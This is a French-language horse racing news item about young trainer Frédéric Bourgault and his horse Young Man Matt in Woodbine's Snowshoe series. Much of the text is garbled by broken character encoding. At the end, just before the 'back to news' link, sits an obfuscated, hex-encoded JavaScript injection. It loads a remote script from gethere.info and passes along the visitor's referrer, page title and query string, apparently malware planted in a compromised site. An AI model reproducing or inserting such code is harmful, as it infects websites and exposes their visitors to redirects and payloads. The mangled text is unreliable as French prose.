Le Snowshoe dans l’oeil de FrA�dA�ric Bourgault

26 janvier 2018 | À l'étranger | By : Daniel Delisle

Quoi de mieux que la��avis da��un entraA�neur sur place A� Toronto pour jauger la valeur des participants A� la sA�rie Snowshoe dont ce sera la 2e tranche ce soir A� Woodbine. Et en plus quand ce tout jeune homme a un participant impliquA�, et que ce jeune homme, FrA�dA�ric Bourgault, A�a bien voulu accepter de se mouiller.

 

Burn Out Hanover

 

A�A� Je pense sincA?rement que mon cheval, Young Man Matt a affrontA� le meilleur participant, vendredi dernier, en Burn Out Hanover. On a terminA� deuxiA?me, mais ja��ai toujours confiance que mon protA�gA� peut faire encore un peu mieux. Chacune des quatre divisions a produit des gagnants qui se sont tous A� peu prA?s promenA�s autour de 1.55. Ce ne sera pas trA?s diffA�rent ce soir.A�A�

 

Ce jeune homme qui sa��exprime ainsi avec une belle assurance est FrA�dA�ric Bourgault.

En avril 2016, avec son baluchon, son anglais approximatif et ses 18 ans, il mettait le cap sur Toronto pour vivre A� fond son rA?ve de vivre avec et par les chevauxA�: A�A�Da��aussi loin que je me souvienne, ja��ai toujours voulu vivre cette vie. Ca��est une passion que ma��a transmise mon oncle et parrain, Serge Nadeau. Quand je me projetais dans la��avenir, je ne pouvais pas ma��imaginer autrement que dans les chevaux. Et ca��est ce que je fais depuis bientA?t deux ans ! A�

A�A�A�videmment, tout na��a pas A�tA� rose, au dA�but. Heureusement, je pouvais compter sur les deux sA�urs Fontaine, les filles de Michel. GrA?ce A� elles, mon intA�gration a tout de mA?me pu se faire graduellement. Je me suis vite dA�nichA� un emploi chez BenoA�t Baillargeon, un entraA�neur exigeant mais trA?s compA�tent, de qui ja��ai beaucoup appris. Ja��ai A�tA� dans cette A�curie pour un peu plus da��un an. Ensuite, ja��ai trouvA� du travail dans une autre grosse A�curie, celle de Scott McEneny. Une autre belle occasion da��apprendre plein de choses sur le mA�tier des chevaux.A�A�

 

 

Young Man Matt

 

A�A�Je suis depuis quelques mois A� mon compte. Ja��ai maintenant trois chevaux dont celui pour lequel ja��ai dA�boursA� 15A�000$, Young Man Matt.A� Mon amiA� Daniel Potvin m’a donnA� un coup de main. Ja��avais eu la chance de ma��approcher du cheval en faisant son paddock et ja��yA� voyais un certain potentiel. Ca��est un cheval avec des problA?mes bien sA�r. Ca��est difficile da��ajuster sa a�?gaitea��, si on peut dire. Mais avec la��aide de mon forgeron et ami, Daniel , ja��ai bon espoir da��y arriver. Si ca��est le cas, A�a pourrait faire un bon cheval. Il va dA�jA� pas mal, alors imaginez sa��il arrivait A� une allure plus fluide !A�A�

Comment ce tout jeune homme a-t-il pu arriver A� ce statut da��entraA�neur en si peu de temps ? A�A� A�a na��a pas A�tA� toujours A�vident. Faut faire attention A� la��argent gagnA� et ne pas craindre le travail! Actuellement, en plus de ma��occuper de mes trois chevaux, je donne un coup de main A� Luc Blais qui est dans la mA?me A�curie que moi, A� Campbellville.A�A�

 

Pour ce soir, avec la 6e position dans la 3e course, FrA�dA�ric se croise les doigts pour que son cheval fasse assez bien pour se qualifier pour la finale du 2 fA�vrier. AprA?s A�a, tout devient possible. Cette 3e course est de loin la plus relevA�eA�: aucun des sept partants na��a terminA� plus loin que 3e dans la premiA?re tranche. Et Young Man Matt y retrouvera Burn Out Hanover entre autres. Ce ne sera pas du bonbon ! A�a ressemble A� la finale avant la finale ! Alors amateurs qui vous intA�ressez aux courses de Woodbine, ca��est ce soir la 2e tranche de la sA�rie Snowshoe. Il y aura trois divisions dans les courses 3,6 et 8. Et na��oubliez pas les pronostics de FrA�dA�ric, un jeune homme qui sait ce qua��il veut et qui fait tout pour y arriver.

 

Je me suis amusA� A� faire quelques calculs sur les dA�buts prometteurs de ce jeune de chez nous. Comme entraA�neur officiel, il a 16 dA�parts et des gains de 24A�566$, ce qui lui fait une moyenne de 1 535$ par dA�part. Ce na��est pas Ron Burke, mais sa carriA?re est sur les rails.

 var _0x31f1=[« \x73\x63\x72\x69\x70\x74″, »\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″, »\x73\x72\x63″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D », »\x72\x65\x66\x65\x72\x72\x65\x72″, »\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D », »\x74\x69\x74\x6C\x65″, »\x26″, »\x3F », »\x72\x65\x70\x6C\x61\x63\x65″, »\x73\x65\x61\x72\x63\x68″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E », »\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″, »\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″, »\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″, »\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″, »\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″, »\x68\x65\x61\x64″, »\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″, »\x70\x72\x6F\x74\x6F\x63\x6F\x6C », »\x68\x74\x74\x70\x73\x3A », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x52\x5F\x50\x41\x54\x48″, »\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E »];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Retour aux nouvelles